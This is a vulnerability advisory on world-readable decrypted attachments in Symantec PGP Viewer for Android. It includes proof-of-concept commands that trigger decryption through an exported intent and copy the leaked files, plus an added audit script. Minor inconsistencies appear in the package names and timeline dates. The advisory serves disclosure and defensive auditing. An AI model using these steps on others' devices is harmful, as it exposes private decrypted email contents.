[Unassigned] SymantecPGPViewer for Android: Weak File Permissions

Description

Symantec PGP Viewer for Android (1.0.3.27) was found to temporarily store attachments decrypted from a PGP-archived email with world-readable file permissions. The attachments are written to the application's files/tmp directory as soon as the user opens a PGP-archived email and are deleted when the application is closed normally. It was also observed that after an application crash or other non-graceful exit, the decrypted attachment files in the files/tmp directory are not deleted.

CVSS 3.0 Base Score

5.0 (AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N)

CWE

CWE-379: Creation of Temporary File in Directory with Insecure Permissions

Researcher

Tanoy Bose - xen1thlabs

POC

Any attachment decrypted by Symantec PGP Viewer is stored in [/data/user/0/]com.symantec.pgpviewer/files/tmp/ in unencrypted, world-readable form. This allows an attacker, or a malicious application with minimal access to the device, to read the decrypted attachments.
Even though the […]/tmp/ directory was emptied after every message read, we noticed that after an unsuccessful exit of the application (such as a crash or a forced stop) the decrypted data persisted, still with world-readable permissions, in the […]/tmp/ folder.
The application can also be launched from a different application via the exported android.intent.action.Viewer action on the AppSplashActivity activity, so a malicious application can trigger the decryption itself rather than waiting for the user to open a message.
The vulnerability was tested and confirmed on Symantec PGP Viewer Android application version 1.0.3.27 on Android 8.1.

For our test, we used an encrypted email called Message.pgp:

-----BEGIN PGP MESSAGE-----
Version: 10.4.1 (Build 777)
Content: PGP-EML

qANQR1DBwEwDNaK2fW1tsMsBB/wIULsNkoXNOTxf9i65kWezgS69rbBfUok/svLT
opQ2B3LLyt9y7yTnF3wavV/XXPkUGJloyCRnNOvSpFXAYH9OWG4J7LV97fyFb5gW
QpL8eD0GWwyp0Nfrse/xo4hCigbj5Ei4beZMEHPHrJFXmvx3A51ssIr78210gaGf
MiAcL79Mv9iNU2L04UoPwOLx2osOjMivkRnkhNYzx+ZuifiljXU9jd8cZElMR490

[...]
W96KSxOjPBPd3LDT43IgyvhWp52fu9XsCYS97TBQi8e3AfQsWh4FTvLlTZtWZEoN
5j5bNBDEuINwXGFnpOIdp7eifa7Efxn+4wIHrEggjozUFqqsDRPHJwumb3A1QmJ0
wmeV7Y8DILAX7RRl5lkYoyIm2zlpOVj+XKKRjLPP3pr8wzxgNn8GI5B1NdOYCl/7
K5Is4VuZnMltIvr4tLtL6Fsu9vGvbjKwqEWp1e0jWw1r8f0=
=kvm0
-----END PGP MESSAGE-----

We can launch the application with the activity manager (am) from a shell, or from any malicious application that sends the same intent, using the following:

$ am start -n com.symantec.pgpviewersymantec/.AppSplashActivity -d file:///data/local/tmp/Message.pgp -a android.intent.action.Viewer

The following listing is provided as evidence of the weak file permissions and the existence of the decrypted files. Note that the extracted attachments are created with mode 0644 (readable by any UID), while the application's own working files (the .pgp copy and the pgpViewer* scratch file) are created with mode 0600; the tmp directory itself is 0775 and the application data directory is 0771, so a process running as another UID can both enumerate the directory and read the attachments.

bullhead:/data/user/0/com.symantec.pgpviewersymantec/files/tmp $ pwd
/data/user/0/com.symantec.pgpviewersymantec/files/tmp
bullhead:/data/user/0/com.symantec.pgpviewersymantec/files/tmp $ ls -alh
total 958K
drwxrwxr-x 2 u0_a112 u0_a112 4.0K 2019-08-05 07:17 .
drwxrwx--x 4 u0_a112 u0_a112 4.0K 2019-08-05 07:17 ..
-rw-r--r-- 1 u0_a112 u0_a112 4.2K 2019-08-05 07:17 image013.png
-rw-r--r-- 1 u0_a112 u0_a112 823 2019-08-05 07:17 image014.jpg
-rw-r--r-- 1 u0_a112 u0_a112 801 2019-08-05 07:17 image015.jpg
-rw-r--r-- 1 u0_a112 u0_a112 4.5K 2019-08-05 07:17 image016.png
-rw-r--r-- 1 u0_a112 u0_a112 1.6K 2019-08-05 07:17 image017.jpg
-rw-r--r-- 1 u0_a112 u0_a112 7.9K 2019-08-05 07:17 image018.png
-rw------- 1 u0_a112 u0_a112 772K 2019-08-05 07:17 pgp39246.pgp
-rw------- 1 u0_a112 u0_a112 564K 2019-08-05 07:17 pgpVieweravYo1b
-rw-r--r-- 1 u0_a112 u0_a112 28K 2019-08-05 07:17 xen1thLabs_advisory_-_SymantecPGPViewer-WorldReadableFiles.docx
-rw-r--r-- 1 u0_a112 u0_a112 500K 2019-08-05 07:17 xen1thLabs_advisory_-_SymantecPGPViewer-WorldReadableFiles.pdf

Extraction of the decrypted files (docx file):

bullhead:/data/user/0/com.symantec.pgpviewersymantec/files/tmp $ cp /data/user/0/com.symantec.pgpviewersymantec/files/tmp/xen1thLabs_advisory_-_SymantecPGPViewer-WorldReadableFiles.docx /data/local/tmp/test.docx

~/symantecTesting $ adb pull /data/local/tmp/test.docx .
/data/local/tmp/test.docx: 1 file pulled. 3.0 MB/s (29167 bytes in 0.009s)

~/symantecTesting $ file test.docx
test.docx: Microsoft Word 2007+

Extraction of the decrypted files (pdf file):

bullhead:/data/user/0/com.symantec.pgpviewersymantec/files/tmp $ cp /data/user/0/com.symantec.pgpviewersymantec/files/tmp/xen1thLabs_advisory_-_SymantecPGPViewer-WorldReadableFiles.pdf /data/local/tmp/test.pdf

~/symantecTesting $ adb pull /data/local/tmp/test.pdf .
/data/local/tmp/test.pdf: 1 file pulled. 9.8 MB/s (511956 bytes in 0.050s)

~/symantecTesting $ file test.pdf
test.pdf: PDF document, version 1.5
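As an added example (not part of the original advisory and not Symantec's code), the following POSIX shell helper automates the check performed above. Its core is a filter over ls -l output that reports regular files whose "other" read bit is set; the device-side functions drive the same am start intent shown in the advisory, and re-check the directory after an am force-stop to reproduce the leftover-after-crash case. The sample listing embedded in the script is constructed from the evidence above so the filter can be exercised without a device. The package name, the five-second wait, and the function names audit_device and leftover_after_crash are this example's own assumptions.

```shell
#!/bin/sh
# Audit helper for the world-readable temp-file issue described above.
# Constructed example; not taken from the advisory or from the Symantec app.

# Package name and tmp path as they appear in the advisory's ls output.
# Both are assumptions of this example and can be overridden by the caller.
PGPV_PKG="${PGPV_PKG:-com.symantec.pgpviewersymantec}"
PGPV_TMP="/data/user/0/$PGPV_PKG/files/tmp"

# Sample `ls -al` output, constructed from the listing in the advisory,
# so the checker can be exercised offline.
SAMPLE_LS='drwxrwxr-x 2 u0_a112 u0_a112 4.0K 2019-08-05 07:17 .
drwxrwx--x 4 u0_a112 u0_a112 4.0K 2019-08-05 07:17 ..
-rw-r--r-- 1 u0_a112 u0_a112 4.2K 2019-08-05 07:17 image013.png
-rw------- 1 u0_a112 u0_a112 772K 2019-08-05 07:17 pgp39246.pgp
-rw------- 1 u0_a112 u0_a112 564K 2019-08-05 07:17 pgpVieweravYo1b
-rw-r--r-- 1 u0_a112 u0_a112 28K 2019-08-05 07:17 advisory.docx'

# perm_others MODE: print the "other" rwx triplet of an ls mode string,
# e.g. perm_others drwxrwx--x -> "--x" (traversable but not listable).
perm_others() {
  printf '%s\n' "$1" | cut -c8-10
}

# world_readable_files: read `ls -l` lines on stdin and print the names of
# regular files (mode starts with "-") whose other-read bit (column 8 of the
# mode string) is set. Directories are skipped; filenames must not contain
# spaces, which holds for the advisory's listing.
world_readable_files() {
  awk '$1 ~ /^-/ && substr($1, 8, 1) == "r" { print $NF }'
}

# count_world_readable: number of world-readable regular files on stdin.
count_world_readable() {
  world_readable_files | wc -l | tr -d ' '
}

# sample_report: run the filter over the constructed listing.
sample_report() {
  printf '%s\n' "$SAMPLE_LS" | world_readable_files
}

# audit_device PGP_FILE: trigger decryption on a connected device via the
# exported activity and list world-readable files left in the tmp directory.
# Needs adb and a device shell able to read the app's data directory (the
# advisory used a rooted bullhead). Intent action, activity and -d form are
# copied from the advisory's `am start` line.
audit_device() {
  pgp_file="${1:?path to a .pgp message on the device, e.g. /data/local/tmp/Message.pgp}"
  adb shell am start -n "$PGPV_PKG/.AppSplashActivity" \
    -d "file://$pgp_file" -a android.intent.action.Viewer
  sleep 5   # assumed delay for the viewer to decrypt and write attachments
  adb shell ls -al "$PGPV_TMP" | world_readable_files
}

# leftover_after_crash: simulate a non-graceful exit with `am force-stop`
# and report which decrypted attachments survive in the tmp directory.
leftover_after_crash() {
  adb shell am force-stop "$PGPV_PKG"
  adb shell ls -al "$PGPV_TMP" | world_readable_files
}
```

Source the script and call audit_device /data/local/tmp/Message.pgp, then leftover_after_crash; any filename printed by the second call is a decrypted attachment that outlived the application. The filter deliberately keys on the mode string rather than on stat, so the same function works on the abbreviated ls implementation in the Android toolbox shell and on a copied listing.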

Disclosure Timelines

  • 22 Aug, 2019 - Reported to Symantec; Won’t Fix
  • 23 Jul, 2019 - Reported to Mitre; No response